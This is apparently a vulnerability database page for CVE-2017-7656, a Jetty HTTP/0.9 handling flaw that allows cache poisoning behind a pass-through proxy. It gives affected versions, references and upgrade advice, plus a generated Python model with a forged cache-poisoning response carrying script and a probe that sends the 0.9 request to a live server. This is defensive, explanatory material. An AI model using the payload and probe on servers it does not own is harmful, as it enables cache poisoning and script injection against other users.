CVE-2017-7656
Description
In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Jetty accepts an HTTP/1-style request line that declares HTTP/0.9 and answers with a bare body (no status line, no headers); an intermediary that forwarded the request unchanged can then read attacker-controlled body bytes as HTTP/1 response headers, which enables cache poisoning when Jetty is deployed behind such a proxy or cache.
Vulnerability
In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x in non-default configuration with RFC2616 compliance enabled, HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e., method space URI space version) that declares a version of HTTP/0.9 is accepted and treated as a 0.9 request [1][3]. This means the server responds without HTTP status line or headers, sending only the entity body. Affected versions include Jetty <= 9.3.23.v20180228 and >= 9.4.0 through <= 9.4.10.v20180503 [3].
Exploitation
An attacker must be able to send requests through an intermediary (such as a reverse proxy or cache) that also accepts the HTTP/0.9 version string and passes it through without acting on it, i.e., forwards the request line as-is [1]. The attacker sends a request whose line reads, for example, GET / HTTP/0.9 to the origin Jetty server. Since Jetty treats this as an HTTP/0.9 request, it responds with the raw body only (no status line, no headers). The intermediary, which expects an HTTP/1 response, parses the first bytes of that raw body as the status line and headers, so an attacker who controls the start of the body can inject arbitrary headers into the response seen by the next client [1][2]. No authentication is required; the attack is performed over the network.
Impact
If the application lets the requesting client control content at the start of the response body (for example by echoing a request parameter), the attacker can shape that content as a complete HTTP/1 response, and the intermediary will cache it as such [1]. Every client that is subsequently served the poisoned entry receives attacker-chosen headers and body, which enables stored cross-site scripting and similar attacks against those users. The practical impact is loss of integrity of the content served for the affected URL and, through injected script, of the confidentiality of those users' sessions; the blast radius depends on how widely the cache is shared and how long the poisoned entry lives.
Mitigation
For 9.3.x, upgrade to 9.3.24.v20180605 or later; for 9.4.x, upgrade to 9.4.11.v20180605 or later [3]. The Jetty bug tracker confirms the fix was applied [2]. Leaving RFC2616 compliance disabled (the default compliance mode) only closes the vulnerable code path on 9.4.x; 9.3.x and older are affected in every configuration and need the upgrade. Independently of the origin, intermediaries (reverse proxies, caches) should reject request lines that declare HTTP/0.9 rather than forward them, since an intermediary that does not pass the 0.9 version through cannot be used to deliver the attack.
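The exchange described under Exploitation and the fix check implied here, as an added example that is not Jetty's code or the page's own. The origin behaviour, the intermediary's parser, the host name `target.example` and the 400 status the patched model returns are all assumptions of this model; only the shape of the HTTP/0.9 "simple response" (body without status line or headers) comes from the advisory. `probe()` opens a real socket and is only meant for a host you own.

```python
"""Model of the CVE-2017-7656 desync: added example, not Jetty's code.

Everything runs in-process on constructed byte strings. Only probe() touches
the network, and only when you call it yourself.
"""
import socket
from typing import Dict, Optional, Tuple


def build_request(path: str, host: str = "target.example") -> bytes:
    """HTTP/1-style request line that nevertheless declares HTTP/0.9."""
    return f"GET {path} HTTP/0.9\r\nHost: {host}\r\n\r\n".encode()


def parse_as_http1(raw: bytes) -> Optional[Tuple[int, Dict[str, str], bytes]]:
    """What a naive intermediary does with the origin's bytes: returns
    (status, headers, body) if a status line is present, else None.
    A stand-in for a proxy parser, not any particular product's code."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/1.") or not parts[1].isdigit():
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().decode().lower()] = value.strip().decode()
    return int(parts[1]), headers, body


def vulnerable_origin(request: bytes, reflected: bytes) -> bytes:
    """Unpatched Jetty (modelled): a request line ending in HTTP/0.9 gets a
    0.9 'simple response', i.e. the body alone. `reflected` stands for
    application output the attacker controls (echoed parameter, stored comment)."""
    request_line = request.split(b"\r\n", 1)[0]
    if request_line.endswith(b" HTTP/0.9"):
        return reflected
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Content-Length: %d\r\n\r\n" % len(reflected)) + reflected


def patched_origin(request: bytes, reflected: bytes) -> bytes:
    """Fixed Jetty (9.3.24 / 9.4.11 and later) no longer treats the line as
    0.9. Answering 400 is this model's assumption; what matters is that a
    status line and headers are always emitted."""
    request_line = request.split(b"\r\n", 1)[0]
    if request_line.endswith(b" HTTP/0.9"):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return vulnerable_origin(request, reflected)


# Constructed attacker payload: a complete forged HTTP/1 response placed at
# the very start of the body. Over HTTP/1.1 it is inert body text; over 0.9
# it is the whole wire response, so the intermediary reads it as headers.
FORGED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Cache-Control: public, max-age=31536000\r\n"
    b"\r\n"
    b"<script>alert(document.domain)</script>"
)


def looks_like_http09_response(raw: bytes) -> bool:
    """Fix check for a real origin: True if no HTTP/1 status line came back.
    Caveat: probe a path whose body cannot begin with 'HTTP/1.' (the forged
    payload above would otherwise pass as a normal response)."""
    return parse_as_http1(raw) is None


def probe(host: str, port: int = 8080, path: str = "/", timeout: float = 5.0) -> bool:
    """Send the 0.9-declaring request to a live server and classify the reply."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(path, host))
        try:
            while data := s.recv(4096):
                chunks.append(data)
        except socket.timeout:
            pass  # keep-alive origin that never closed; classify what we got
    return looks_like_http09_response(b"".join(chunks))


if __name__ == "__main__":
    req = build_request("/echo")
    print("HTTP/1.1 request, proxy sees headers:",
          parse_as_http1(vulnerable_origin(b"GET /echo HTTP/1.1\r\n\r\n", FORGED))[1])
    print("HTTP/0.9 request, vulnerable origin, proxy sees headers:",
          parse_as_http1(vulnerable_origin(req, FORGED))[1])
    print("HTTP/0.9 request, patched origin, status:",
          parse_as_http1(patched_origin(req, FORGED))[0])
```

Running the script shows the same reflected bytes being a harmless body over HTTP/1.1 and becoming the proxy's view of status line and headers (including the long-lived `Cache-Control`) over the 0.9-declaring request; against the patched model the proxy sees a real status line instead.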
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.eclipse.jetty:jetty-server | Maven | < 9.3.24.v20180605 | 9.3.24.v20180605 |
| org.eclipse.jetty:jetty-server | Maven | >= 9.4.0, < 9.4.11.v20180605 | 9.4.11.v20180605 |
Affected products
- The Eclipse Foundation / Eclipse Jetty (version range: unspecified)
Patches
No patches discovered yet.
References
- github.com/advisories/GHSA-84q7-p226-4x5w (GHSA advisory)
- nvd.nist.gov/vuln/detail/CVE-2017-7656 (NVD entry)
- www.debian.org/security/2018/dsa-4278 (Debian vendor advisory DSA-4278)
- www.securitytracker.com/id/1041194 (SecurityTracker VDB entry)
- bugs.eclipse.org/bugs/show_bug.cgi (Eclipse bug tracker, vendor confirmation)
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E (mailing list: issues.activemq.apache.org)
- lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E (mailing list: solr-user.lucene.apache.org)
- lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E (mailing list: commits.druid.apache.org)
- lists.apache.org/thread.html/rbf4565a0b63f9c8b07fab29352a97bbffe76ecafed8b8555c15b83c6@%3Cissues.maven.apache.org%3E (mailing list: issues.maven.apache.org)
- security.netapp.com/advisory/ntap-20181014-0001/ (NetApp advisory)
- support.hpe.com/hpsc/doc/public/display (HPE support document)
- www.oracle.com//security-alerts/cpujul2021.html (Oracle Critical Patch Update, July 2021)
- www.oracle.com/security-alerts/cpuoct2020.html (Oracle Critical Patch Update, October 2020)
- www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html (Oracle Critical Patch Update, October 2019)